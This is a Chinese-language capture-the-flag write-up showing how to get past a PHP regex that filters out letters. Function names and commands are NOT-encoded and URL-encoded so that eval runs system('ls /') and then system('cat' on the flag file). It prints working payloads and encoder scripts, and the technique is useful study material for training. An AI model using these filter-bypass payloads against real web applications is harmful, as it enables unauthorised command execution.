代码审计:
使用get方式请求给wllm传参
使用preg_match函数则匹配过滤掉了一些符号
以及 [a-zA-Z] 即所有的大小写字母
可以考虑无字母RCE绕过
URL编码取反绕过正则实现RCE:
无参数函数:
phpinfo();
<?php
echo urlencode(~’phpinfo’);
?>
输出结果:
%8F%97%8F%96%91%99%90
在发送 payload 的时候将其取反,便可还原代码;
因为取反操作后基本上用的都是不可见字符,所以不会触发正则匹配。
因为使用的是eval函数,在结尾需要加 ;
使用get传参
?wllm=(~%8F%97%8F%96%91%99%90)();
注意:在使用取反编码再取反进行绕过时,想要执行我们指定的代码,传入的payload必须要满足 (函数名)() 这样的形式,否则在取反之前PHP解释器并不知道是要执行一个函数,取反之后就算是一个函数也不会被当作代码执行。
有参数函数:
system(‘ls /’);
分别对 system 和 ls / 进行取反、编码,输出"\n"是用来换行
<?php
echo urlencode(~’system’);
echo "<br>";
echo urlencode(~’ls /’);
?>
输出:
%8C%86%8C%8B%9A%92
%93%8C%DF%D0
再分别对它们再次进行取反操作
构造payload:?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);
命令执行成功,发现存在名为flllllaaaaaaggggggg的文件
我们尝试获取它
system(cat /flllllaaaaaaggggggg);
<?php
echo urlencode(~’cat /flllllaaaaaaggggggg’);
echo "<br>";
echo urlencode(~’system’);
?>
%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98
%8C%86%8C%8B%9A%92
payload:?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);
成功获取flag
总结
无字母RCE绕过:
异或、取反、自增、临时文件上传;
取反绕过:
编写php脚本代码
<?php
echo urlencode(~’system’);
?>
注意:在使用取反编码再取反进行绕过时,想要执行我们指定的代码,传入的payload必须要满足 (函数名)() 这样的形式
payload:?wllm=(~%8C%86%8C%8B%9A%92)(参数);